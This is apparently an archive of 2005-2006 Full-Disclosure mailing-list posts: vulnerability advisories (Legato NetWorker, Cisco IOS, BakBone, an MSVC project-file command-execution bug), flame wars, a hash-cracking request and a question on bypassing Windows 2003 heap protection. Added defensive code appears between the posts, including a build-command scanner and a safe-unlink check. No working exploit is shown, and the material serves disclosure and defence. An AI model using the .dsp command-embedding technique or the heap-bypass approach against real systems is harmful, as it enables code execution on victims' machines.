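ASSOC_RESP_REFUSED = struct.pack("<HHH", ESS, 10, 0)            # status 10: capabilities not supported

if __name__ == "__main__":
    print("request:", parse_assoc_request(ASSOC_REQ))
    print("downgrade seen:", dumbdown_observed(ASSOC_REQ, ASSOC_RESP_CLEAR))
    print("WEP profile accepts clear response:",
          client_should_accept(True, ASSOC_RESP_CLEAR))
```

The same `dumbdown_observed` test, run by a wireless IDS over monitor-mode captures, gives a defender a concrete signature for the attack: any successful association response with Privacy=0 answering a request that carried Privacy=1.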

Re: [Full-disclosure] Secure Delete for Windows

2006-01-17 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
it's against the charter, true, but it's tolerated because you aren't the
first to promote your tool and you won't be the last; idefense,
immunity, cirt.dk, they all promote their work and I wish they will
continue. just ignore the bad comments about this, or at least if it
was comments from a useful person, but in this case, GTi has nothing
to say on this list.

sk wrote:
> thank you for the constructive feedback. at least it was useful
> and not just some random flame. i do appreciate your comment, i
> don't agree with some points though. it may be the default business
> strategy, but if a single person (or a handful) think they have to
> complain that i announce a security application here, i do argue
> about it. then again, i should better ignore such random bullshit
> as there will be always some smart ass who thinks he has to post a
> negative and senseless comment.
>
>> I guess you only consider orders useful.  I wonder how you
>> respond to complaints about bugs?
>
> i'd appreciate it, as then we can make the software more stable.
> that's only good.
>
>> Remember! Swearing at your customers shows them who's boss!
> done with sarcasm ?
>
>> ** this is not an endorsement or support of any community
>> members, but rather an observation that it is typical business
>> practice to treat even the most annoying potential customer with
>> respect.
>
> i know that those arent even potential customers so thats why. a
> real customer, of course, will receive a friendly response.
>
> - Original Message -
> From: "Yvan Boily" <[EMAIL PROTECTED]>
> To: "GroundZero Security" <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Tuesday, January 17, 2006 9:09 PM
> Subject: Re: [Full-disclosure] Secure Delete for Windows
>
>
>> Now for the lesson on business communication:
>>
>> 1. Dealing with open source proponents:
>>> also not everyone posts their source so what is your fucking
>>> problem?!
>> 2. Elliciting positive feedback:
>>> my god if you dont have anything usefull to say, then why dont
>>> you stfu.
>> 3. Commenting on community members**:
>>> it seems suddenly after this n3td0rk shit, everyone starts his
>>> own little flame wars over nothing
>> Remember! Swearing at your customers shows them who's boss!
>>
>> ---
>>
>> I guess you only consider orders useful.  I wonder how you
>> respond to complaints about bugs?
>>
>> Just a note; if you are going to market your product to people
>> try to avoid making a negative impression!  And certainly, reply
>> to people individually as you will, but if you are going to blast
>> someone then do it privately.  I know this is not really my
>> nature, but then again, I am not marketing products!
>>
>> ** this is not an endorsement or support of any community
>> members, but rather an observation that it is typical business
>> practice to treat even the most annoying potential customer with
>> respect.
>>
>
>
>
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
-END PGP SIGNATURE-




Re: [Full-disclosure] Security Bug in MSVC

2006-01-17 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
I think ms won't fix any bug in vstudio; I asked them whether they would
fix the vs2005 issue published recently and they told me exactly what
is on your support page:

"Only open project files that come from trusted sources."


or "Only open WMF files that come from trusted sources." would have
been less effort than releasing a patch then lol :D


Morning Wood wrote:
> EXPL-A-2006-002 exploitlabs.com Advisory 048
>
> - MSVC 6.0 run file bug -
>
>
>
>
> AFFECTED PRODUCTS = Microsoft Visual Studio 6.0
> http://microsoft.com
>
> Possibly other products referenced in:
> http://support.microsoft.com/kb/841189
>
>
>
> OVERVIEW
>
> Source code project distributions are very popular these days.
> Generally authors offer code as a project with source, headers, and
> msvc project files if it is a fairly big project. Most users will
> simply open up the project.dsw file (especially if it says to do so
> in a readme.txt or other compiler instructions), which in turn loads
> the project.dsp files, which provide the compiler directives. A
> malicious attacker could embed commands to be executed in the
> project files, and execute any local code of his choosing.
>
> note: this is an implemented feature in MSVC, and should be
> considered a bug, not a vulnerability.
>
>
>
> IMPACT
>
> The impact of this is quite severe, as it is possible to script
> commands such as to launch ftp, retrieve and execute a file from a
> remote location.
>
>
>
>
> DETAILS
>
> By modifying the .dsp files:
>
> project settings, custom build, Commands: command to execute
> Post-build Step: command to execute
>
>
> 1.a  InputPath=.\Release\hello.exe SOURCE="$(InputPath)"
>
> "hello.exe" : $(SOURCE) "$(INTDIR)" "$(OUTDIR)" calc
>
> 1.b  PostBuild_Cmds=notepad.exe
>
>
>
> POC
>
> http://exploitlabs.com/files/advisories/msvc-featurebug-POC.zip
>
> extract, and open hello.dsw; click "batch build, build" or "rebuild
> all" and code will execute ( calc.exe and notepad.exe used as an
> example )
> calc.exe = Custom-Build
> notepad.exe = PostBuild Commands
>
>
>
> SOLUTION
>
> vendor contact: [EMAIL PROTECTED] Sept 20, 2005
> http://support.microsoft.com/kb/841189 updated Jan 6, 2006
>
> Microsoft provided these URL's as well:
> http://msdn.microsoft.com/library/en-us/vsintro7/html/vxurfopenprojectfromwebdialogbox.asp
> http://msdn2.microsoft.com/en-us/library/bs2bkwxc.aspx
>
>
>
>
> SUGGESTED PATCH
>
> Include a dialog box that warns the user, before pre and post build
> directives can be launched, if execute directives are present in the
> build project files.
>
>
>
>
> CREDITS
>
> This vulnerability was discovered and researched by Donnie Werner of
> exploitlabs
>
> mail: wood at exploitlabs.com
> mail: morning_wood at zone-h.org

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
-END PGP SIGNATURE-
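An added example, not the exploitlabs PoC and not a Microsoft tool: a Python scanner that lists the build-time commands a VC6 .dsp file carries (tab-indented recipe lines inside a custom build rule, and `*_Cmds` keys such as the `PostBuild_Cmds` the advisory quotes) so a downloaded project can be reviewed before anyone opens it. The sample .dsp text is constructed in the VC6 layout with the advisory's `calc` and `notepad.exe` as the embedded commands; the `# Begin Special Build Tool` block is written from my recollection of the format and is an assumption.

```python
"""List the build-time commands a Visual C++ 6 .dsp project file would run.

Added example for the MSVC advisory above; not exploitlabs' PoC and not a
Microsoft tool.  SAMPLE_DSP is constructed: a VC6-style project carrying
the two directive kinds the advisory names (a custom build rule running
calc and a PostBuild_Cmds step running notepad.exe).
"""
import re

SAMPLE_DSP = """\
# Microsoft Developer Studio Project File - Name="hello" - Package Owner=<4>
# TARGTYPE "Win32 (x86) Console Application" 0x0103

CFG=hello - Win32 Release
# Begin Project
# Begin Target
# Begin Group "Source Files"
# Begin Source File

SOURCE=.\\hello.c
# End Source File
# Begin Source File

SOURCE=.\\hello.rc
# Begin Custom Build
InputPath=.\\Release\\hello.exe
SOURCE="$(InputPath)"

"hello.exe" : $(SOURCE) "$(INTDIR)" "$(OUTDIR)"
\tcalc

# End Custom Build
# End Source File
# End Group
# Begin Special Build Tool
PostBuild_Cmds=notepad.exe
# End Special Build Tool
# End Target
# End Project
"""

CMDS_KEY = re.compile(r"^(\w+_Cmds)=(.*)$")    # PostBuild_Cmds=... and similar keys
RULE_LINE = re.compile(r'^"[^"]+"\s*:')        # nmake-style rule: "target" : deps


def find_build_commands(dsp_text: str) -> list:
    """Return (line number, kind, command) for every command the IDE would
    run when the project is built: any *_Cmds key, and the tab-indented
    recipe lines that follow a rule inside a '# Begin Custom Build' block."""
    findings = []
    in_custom = False
    after_rule = False
    for lineno, line in enumerate(dsp_text.splitlines(), start=1):
        m = CMDS_KEY.match(line)
        if m:
            findings.append((lineno, m.group(1), m.group(2).strip()))
            continue
        if line.startswith("# Begin Custom Build"):
            in_custom, after_rule = True, False
        elif line.startswith("# End Custom Build"):
            in_custom, after_rule = False, False
        elif in_custom:
            if RULE_LINE.match(line):
                after_rule = True
            elif after_rule and line.startswith("\t") and line.strip():
                findings.append((lineno, "Custom Build", line.strip()))
            elif after_rule and not line.strip():
                after_rule = False   # a blank line ends the rule's recipe
    return findings


def has_build_commands(dsp_text: str) -> bool:
    """True when the project would execute anything beyond the compiler."""
    return bool(find_build_commands(dsp_text))


if __name__ == "__main__":
    for lineno, kind, command in find_build_commands(SAMPLE_DSP):
        print(f"line {lineno}: {kind}: {command}")
```

Run against a project before opening it, the list is what the warning dialog the advisory suggests would have to show; a non-empty result is the cue to read the commands rather than click "rebuild all".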




[Full-disclosure] iDefense Security Advisory 01.17.06: Cisco Systems IOS 11 Web Service CDP Status Page Code Injection Vulnerability

2006-01-17 Thread [EMAIL PROTECTED]
tp://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


[Full-disclosure] iDefense Security Advisory 01.17.06: EMC Legato Networker nsrd.exe Heap Overflow Vulnerability

2006-01-17 Thread [EMAIL PROTECTED]

EMC Legato Networker nsrd.exe Heap Overflow Vulnerability

iDefense Security Advisory 01.17.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=373
January 17, 2006

I. BACKGROUND

EMC Legato NetWorker is a cross-platform backup and recovery
application.

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in EMC Corp.'s
Legato Networker allows attackers to execute arbitrary code on Windows
platforms.

The vulnerability specifically exists due to improper handling of
malformed RPC requests to RPC program number 390109. When such a request
is sent by an attacker, it is possible to overwrite portions of heap
memory, thus leading to arbitrary code execution.

III. ANALYSIS

Successful exploitation allows a remote attacker to gain access to a
targeted machine. As nsrd.exe is installed on backup client machines
and server machines, an attacker may rapidly compromise a network using
this vulnerability.

IV. DETECTION

iDefense has confirmed this vulnerability in Networker 7.2 build 172.
All previous versions are suspected vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

"Complete resolutions to the vulnerabilities are available today in
NetWorker 7.1.4 and 7.3. EMC has created a hot-fix to protect against
vulnerabilities for 7.2.1 customers.  No fixes are planned for previous
NetWorker releases."

"These remedies are available for download at:"

 http://www.legato.com/support/websupport/product_alerts/011606_NW.htm

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3658 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification
11/17/2005 Initial vendor response
01/17/2006 Coordinated public disclosure

IX. CREDIT

Jo Goossens is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



[Full-disclosure] iDefense Security Advisory 01.17.06: EMC Legato Networker nsrexecd.exe Heap Overflow Vulnerability

2006-01-17 Thread [EMAIL PROTECTED]

EMC Legato Networker nsrexecd.exe Heap Overflow Vulnerability

iDefense Security Advisory 01.17.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=374
January 17, 2006

I. BACKGROUND

EMC Legato NetWorker is a cross-platform backup and recovery
application.

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in EMC Corp.'s
Legato Networker allows attackers to execute arbitrary code on Windows
platforms.

The vulnerability specifically exists due to improper handling of
malformed RPC requests to RPC program number 390113. When such a request
is sent by an attacker, it is possible to overwrite portions of heap
memory, thus leading to arbitrary code execution by way of a function
pointer overwrite. If an attacker can populate memory so that his data
is in a predictable location, arbitrary code execution is possible. It
is possible to populate memory in several ways, including by utilizing
memory leaks.

III. ANALYSIS

Successful exploitation allows a remote attacker to gain access to a
targeted machine. As nsrd.exe is installed on backup client machines
as well as server machines, an attacker may rapidly compromise a
network using this vulnerability.

IV. DETECTION

iDefense has confirmed this vulnerability in Networker 7.2 build 172.
All previous versions are suspected vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

"Complete resolutions to the vulnerabilities are available today in
NetWorker 7.1.4 and 7.3.  EMC has created a hot-fix to protect against
vulnerabilities for 7.2.1 customers.  No fixes are planned for previous
NetWorker releases."

"These remedies are available for download at:"

http://www.legato.com/support/websupport/product_alerts/011606_NW.htm

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3658 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification
11/17/2005 Initial vendor response
01/17/2006 Coordinated public disclosure

IX. CREDIT

Jo Goossens is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



[Full-disclosure] iDefense Security Advisory 01.17.06: EMC Legato Networker nsrd.exe DoS Vulnerability

2006-01-17 Thread [EMAIL PROTECTED]

EMC Legato Networker nsrd.exe DoS Vulnerability

iDefense Security Advisory 01.17.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=375
January 17, 2006

I. BACKGROUND

EMC Legato NetWorker is a cross-platform backup and recovery
application.

II. DESCRIPTION

Remote exploitation of a denial of service vulnerability in EMC Corp.'s
Legato Networker allows attackers to crash the nsrd service.

The vulnerability specifically exists due to improper handling of
malformed RPC requests to RPC program number 390109. By sending such a
request, an attacker is able to cause a NULL pointer to be used as the
base in a memory reference, which leads to a crash of the service. The
daemon will crash on a NULL pointer dereference as no exception handlers
are invoked which might allow it to recover.

III. ANALYSIS

Successful exploitation allows a remote attacker to crash the nsrd.exe
process.

IV. DETECTION

iDefense has confirmed this vulnerability in Networker 7.2 build 172.
All previous versions are suspected vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

"Complete resolutions to the vulnerabilities are available today in
NetWorker 7.1.4 and 7.3.  EMC has created a hot-fix to protect against
vulnerabilities for 7.2.1 customers.  No fixes are planned for previous
NetWorker releases."

"These remedies are available for download at:"

 http://www.legato.com/support/websupport/product_alerts/011606_NW.htm

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3659 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification
11/17/2005 Initial vendor response
01/17/2006 Coordinated public disclosure

IX. CREDIT

Jo Goossens is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



[Full-disclosure] Practical Wireless Deployment Methodology (PWDM)

2006-01-18 Thread [EMAIL PROTECTED]
Hi Everyone,

We've launched a hardware-neutral wireless deployment/upgrading 
methodology at http://www.pwdm.net and would like some feedback on 
whether it is useful to you and how we can make it more so.

The PWDM (Practical Wireless Deployment Methodology) is a practical, 
vendor-independent methodology which is intended to help people who 
are tasked with deploying, upgrading, maintaining & securing 802.11-based
WLANs, irrespective of whether they are private (SOHO,
enterprise, home) or public (hotspots) in nature. 

The methodology comprises the following steps:
* Deployment Analysis
* Contractual Negotiation
* Deployment Tactical Planning
* Deployment Procedural Rollout
* Supporting Infrastructure Rollout
* AP Security Issues
* Layer 3 Mitigation Strategies
* Management Overlay
* Gateway Security
* UAT & Commissioning

If you're interested in taking a look, you can download the current 
version of the PWDM (ver 1.4) at http://www.pwdm.net  

Thanks & Regards,
J.Ho


[Full-disclosure] Hash Type?

2006-01-19 Thread [EMAIL PROTECTED]
Can someone please tell me if these are DES hashes, or if they could
be Oracle hashes? I cannot get JTR to crack them, which leads me to
believe they may not be DES. Any help please?

Username: UCN016
Password Hash: 8F789BA55BA187380BA1

Re: [Full-disclosure] Security Bug in MSVC

2006-01-19 Thread [EMAIL PROTECTED]
 
and me, I think most FD members are desperate of such newcomer
comments; you have nothing interesting to say about the work he was
doing before you were born.
 
redsand wrote:
>
>
> i think the author of this advisory is desperate for advisories or
> attention.
>
> either way he needs to open a disassembler and work on something
> else.
>
> Pavel Kankovsky wrote:
>
>> On Tue, 17 Jan 2006, Morning Wood wrote:
>>
>>
>>
>>> extract, and open hello.dsw click "batch build, build" or
>>> "rebuild all" code will execute ( calc.exe and notepad.exe used
>>> as an example )
>>>
>>
>> What's the point of building a bunch of sources unless 1. you
>> trust their author, or 2. you have made sure their is nothing
>> malicious there?
>>
>> When you build an executable from untrusted sources, you get an
>> untrusted executable. Either you run it and you're screwed
>> anyway, or you don't run it and you wasted your time building it.
>>
>>
>> (Indeed, there are some marginal cases like when you want to
>> build an executable file intended to run on someone else's
>> computer...)
>>
>> --Pavel Kankovsky aka Peak  [ Boycott
>> Microsoft--http://www.vcnet.com/bms ] "Resistance is futile. Open
>> your source code and prepare for assimilation."
>>



Re: [Full-disclosure] Security Bug in MSVC

2006-01-19 Thread [EMAIL PROTECTED]
 
not up to you.

redsand wrote:
>
>
> like selling all my M$ Excel exploits
>
> [EMAIL PROTECTED] wrote:
>
> and me I think most FD members are desesperate of such newcomer
> comments, you have nothing to say interesting about his work he's
> doing before you were born.



Re: [Full-disclosure] Lameness (with guidelines)

2005-03-24 Thread [EMAIL PROTECTED]
http://lists.grok.org.uk/full-disclosure-charter.html

quote:
Full-Disclosure Acceptable Content

Any information pertaining to vulnerabilities is acceptable, for instance
announcement and discussion thereof, exploit techniques and code, related
tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is forbidden.
Disagreements, flames, arguments, and off-topic discussion should be taken
off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. Politics
should be avoided at all costs.

Members are reminded that due to the open nature of the list, they should
use discretion in executing any tools or code distributed via this list.

-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "David Chastain" <[EMAIL PROTECTED]>
To: "Todd Towles" <[EMAIL PROTECTED]>
Cc: 
Sent: Thursday, March 24, 2005 3:41 PM
Subject: RE: [Full-disclosure] Lameness


> It sounds then like its reputation has already been labeled??? Is there a
moderator that can take control a little and maybe get FD back on the
right track
>
> On Thursday, March 24, 2005, at 05:52AM, Todd Towles
<[EMAIL PROTECTED]> wrote:
>
> >You haven't been here too long if this is starting to anger you..welcome
> >to FD. Google to find the other list...
> >
> >> -----Original Message-
> >> From: [EMAIL PROTECTED]
> >> [mailto:[EMAIL PROTECTED] On Behalf
> >> Of Anders Breindahl
> >> Sent: Wednesday, March 23, 2005 5:36 PM
> >> To: full-disclosure@lists.grok.org.uk
> >> Subject: Re: [Full-disclosure] Asshat coders
> >>
> >> I actually wonder whether this list has become the hangout
> >> place for all lameness of seclists.
> >>
> >> Any plan of action, or should I too just attempt learning to
> >> ignore this? Who was that guy who ran a moderated version of
> >> this list again?
> >>
> >> Regards, Anders Breindahl.
> >>
> >> On Thursday 24 March 2005 00:19, Vladamir wrote:
> >> > Can you guys take this childish shit elsewhere Thanks!
> >> >
> >> > VeNoMouS wrote:
> >> > > ya know im going to mirror your code on as many sites as
> >> i can now,
> >> > > since your such a cock.
> >> ...
> >> > >> VeNoMouS venom at gen-x.co.nz wrote:
> >> > >>> We got this email @ milw0rm today, htf can some one bitch this
> >> > >>> much for posting their exploit I think its kinda
> >> retarded that
> >> > >>> they release it but it MUST come from only there
> >> website, GOT M$ tactics??
> >> ...
> >> > >> rofl m$ tactics, thats sure thing, i want to spent rest
> >> of my life
> >> > >> filled with springsteens and wine.
> >> ...
> >> > >> KF (lists) kf_lists at digitalmunition.com wrote:
> >> > >>> I think he has sand in his vagina.
> >> > >>> -KF
> >> ...
> >> > >> kf: oh, sorry kf, i didnt post it to 0dd first ;(
> >> > >>ever heard of reinforced condoms? gosh, dont spread rumours
> >> > >>about our sexual problems in public, it hurts my
> >> feelings for you.
> >> > >>
> >> > >> and just for the record, anyone else keeping krad.c
> >> mirrored please
> >> > >> rm it, the reason is that im in fact incredible asshole and i'd
> >> > >> rather prefer having it traded by kids on #darknet for
> >> like half a
> >> > >> year, just like sk2.



[Full-disclosure] Question: Heap Overflows on 2k3/SP2

2005-03-27 Thread [EMAIL PROTECTED]
Do you know a reliable way to bypass the heap protection present in w2k3?
I have trouble understanding why my heap overflow exploit (own discovery)
isn't working properly on 2k3.

If you are familiar with exploiting them, explain to me how...
Look at the bottom to see what the check looks like:

> on 2k3: (on SP2 it's quite the same, I think, with the check register EDI
> replaced by EDX)
>
> 77F370ED   8B02           MOV EAX,DWORD PTR DS:[EDX]
> 77F370EF   8985 F0FE      MOV DWORD PTR SS:[EBP-110],EAX
> 77F370F5   8B4A 04        MOV ECX,DWORD PTR DS:[EDX+4]
> 77F370F8   898D 68FE      MOV DWORD PTR SS:[EBP-198],ECX
> 77F370FE   8B39           MOV EDI,DWORD PTR DS:[ECX]
> 77F37100   3B78 04        CMP EDI,DWORD PTR DS:[EAX+4]   <= protection
> 77F37103   0F85 F4FC      JNZ ntdll.77F36DFD
> 77F37109   3BFA           CMP EDI,EDX                    <= protection
> 77F3710B   0F85 ECFC      JNZ ntdll.77F36DFD
> 77F37111   8901           MOV DWORD PTR DS:[ECX],EAX
> 77F37113   8948 04        MOV DWORD PTR DS:[EAX+4],ECX
>
As you can see, it's not possible to use EAX as a "what" and ECX as a "where"
pointing to the UEF because of the previous check.
I think I have read somewhere about a method using the lookaside table; if you
are familiar with it, thanks for explaining it to me ;)
>
> -
> class101
> Jr. Researcher
> Hat-Squad.com
> -


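
The two CMP instructions in the listing quoted above are the safe-unlink
check that the Windows Server 2003 heap applies before it removes a free
chunk from its doubly-linked list: both of the entry's neighbours must
point back at the entry. The C below is an added illustration of that
check; it is not the poster's code and not ntdll's. The list type, the
function names and the corrupted sample are constructed here. It shows
the check refusing an entry whose links were overwritten, so that the two
stores after the check never land on addresses taken from the corrupted
entry, and a walk that verifies a whole list the same way.

```c
#include <stddef.h>
#include <stdio.h>

/* Same shape as the Flink/Blink pair the listing walks: [EDX] and [EDX+4]. */
struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
};

static void list_init(struct list_entry *head) { head->flink = head->blink = head; }

static void list_insert_tail(struct list_entry *head, struct list_entry *e)
{
    e->flink = head;
    e->blink = head->blink;
    head->blink->flink = e;
    head->blink = e;
}

/* Mirrors the quoted ntdll sequence. Unlinks `e` and returns 1 only when
   e->blink->flink == e->flink->blink == e; otherwise returns 0 without writing. */
int safe_unlink(struct list_entry *e)
{
    struct list_entry *f = e->flink;        /* MOV EAX,[EDX]   */
    struct list_entry *b = e->blink;        /* MOV ECX,[EDX+4] */
    struct list_entry *probe = b->flink;    /* MOV EDI,[ECX]   */
    if (probe != f->blink) return 0;        /* CMP EDI,[EAX+4] ; JNZ fail */
    if (probe != e)        return 0;        /* CMP EDI,EDX     ; JNZ fail */
    b->flink = f;                           /* MOV [ECX],EAX   */
    f->blink = b;                           /* MOV [EAX+4],ECX */
    e->flink = e->blink = NULL;
    return 1;
}

/* Integrity walk: every node's neighbours must point back at it.
   Returns the node count, or -1 at the first inconsistency. */
int list_check(const struct list_entry *head)
{
    int n = 0;
    for (const struct list_entry *p = head->flink; p != head; p = p->flink) {
        if (p->flink->blink != p || p->blink->flink != p) return -1;
        n++;
    }
    return n;
}

/* Scenario 1: well-formed list, unlinking the middle node succeeds. Returns 1 on success. */
int demo_legit_unlink(void)
{
    struct list_entry head, a, b, c;
    list_init(&head);
    list_insert_tail(&head, &a); list_insert_tail(&head, &b); list_insert_tail(&head, &c);
    if (list_check(&head) != 3) return 0;
    if (!safe_unlink(&b)) return 0;
    return list_check(&head) == 2 && a.flink == &c && c.blink == &a;
}

/* Scenario 2: an overflow has replaced victim's Flink/Blink with two foreign
   addresses (constructed here as plain stack objects). The check refuses the
   unlink, so `where` is never written. Returns 1 if refused and `where` untouched. */
int demo_corrupted_unlink(void)
{
    struct list_entry what = { NULL, NULL }, where = { NULL, NULL }, victim;
    victim.flink = &what;      /* the value an unchecked unlink would store  */
    victim.blink = &where;     /* the place an unchecked unlink would store it */
    int refused = !safe_unlink(&victim);
    return refused && where.flink == NULL && what.blink == NULL;
}

/* Scenario 3: a node whose Flink was redirected is caught by the walk. Returns 1 if caught. */
int demo_detect_tampering(void)
{
    struct list_entry head, a, b, c;
    list_init(&head);
    list_insert_tail(&head, &a); list_insert_tail(&head, &b); list_insert_tail(&head, &c);
    b.flink = &head;           /* constructed corruption: b now skips c */
    return list_check(&head) == -1;
}

int main(void)
{
    printf("legit unlink ok:       %d\n", demo_legit_unlink());
    printf("corrupted unlink refused: %d\n", demo_corrupted_unlink());
    printf("tampering detected:    %d\n", demo_detect_tampering());
    return 0;
}
```

The first comparison alone would accept any pair of neighbours that
happen to agree with each other, which is why the listing also compares
the probe against the entry itself; both checks read through the
entry's own links before anything is written.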


Re: [Full-disclosure] Question: Heap Overflows on 2k3/SP2

2005-03-28 Thread [EMAIL PROTECTED]
This paper itself isn't so good; it is a dupe of /csw04-Oded+Connover.ppt.
The 2 codes in the appendix are new, yes, for SP2/2k3, but as usual a paper
describes what is in the appendix, and unfortunately in this one, nope, they
copy-pasted what Oded and Connover wrote.

Thanx anyway

-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "Nick Eoannidis" <[EMAIL PROTECTED]>
To: 
Sent: Monday, March 28, 2005 1:55 PM
Subject: Re: [Full-disclosure] Question: Heap Overflows on 2k3/SP2


> class 101, this may help you
>
> http://www.maxpatrol.com/defeating-xpsp2-heap-protection.htm
>
> good luck
>
> Nikon
>
> Xillion Computers
> "Trust your Technolust"
> http://www.xillioncomputers.com
> http://www.technolusthosting.com
> [EMAIL PROTECTED]
>



Re: [Full-disclosure] Re: Question: Heap Overflows on 2k3/SP2

2005-03-29 Thread [EMAIL PROTECTED]
very useful, thank you a lot for the link :)


-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "m conover" <[EMAIL PROTECTED]>
To: 
Sent: Tuesday, March 29, 2005 2:16 AM
Subject: [Full-disclosure] Re: Question: Heap Overflows on 2k3/SP2


> Perhaps this one will be more useful:
> http://www.cybertech.net/~sh0ksh0k/xpsp2_heap_exploitation
> The presentation material was never formally released, but it was
presented
> at SyScan in Dec 2004



[Full-disclosure] BakBone products multiple vulnerabilities

2005-04-01 Thread [EMAIL PROTECTED]
The Hat-Squad has found 2 exploitable vulnerabilities affecting BakBone
NetVault Backup Software 6.x/7.x.
At the moment of writing this advisory, no decent communications have been
established with the BakBone technicians; we recommend setting strict ACL
rules on the file configure.cfg and filtering all incoming connections to
20031/tcp and 20031/udp.

class101.org/netv-locsbof.pdf
class101.org/netv-remhbof.pdf

-
class101
Jr. Researcher
Hat-Squad.com
-



[Full-disclosure] BakBone Netvault 6.x/7.x Remote Heap Buffer Overflow

2005-04-01 Thread [EMAIL PROTECTED]
According to their website (bakbone.com),
BakBone NetVault 6.x/7.x is professional backup software, with several
offices around the world and some pro customers such as Apple, AT&T, Pirelli,
LMU, HP, NIP, NASA, etc.

A vulnerability exists in the NetVault server.

advisory: class101.org/netv-remhbof.pdf
poc: class101.org/36/55/op.php

recommendation: block incoming connections to 20031/tcp and 20031/udp
-
class101
Jr. Researcher
Hat-Squad.com
-



[Full-disclosure] BakBone Netvault 6.x/7.x Local Stack Buffer Overflow

2005-04-01 Thread [EMAIL PROTECTED]
According to their website (bakbone.com),
BakBone NetVault 6.x/7.x is professional backup software, with several
offices around the world and some pro customers such as Apple, AT&T, Pirelli,
LMU, HP, NIP, NASA, etc.

A vulnerability exists in the configure.cfg file.

advisory: class101.org/netv-locsbof.pdf
poc: class101.org/36/55/op.php

recommendation: set strict ACL rules on this file.
-
class101
Jr. Researcher
Hat-Squad.com
-



[Full-disclosure] BakBone NetVault 6.x/7.x Local Stack Buffer Overflow

2005-04-04 Thread [EMAIL PROTECTED]
Last Recall of a NetVault vulnerability still unpatched

http://class101.org/netv-locsbof.pdf

-
class101
Jr. Researcher
Hat-Squad.com
-



[Full-disclosure] Microsoft Windows Internet Name Service (WINS) Remote Heap Overflow Exploit

2005-04-04 Thread [EMAIL PROTECTED]

class101.org for a clean code.

/*
   Windows Internet Name Service (WINS)
   Remote Heap Buffer Overflow
   
   

Advisory credits:


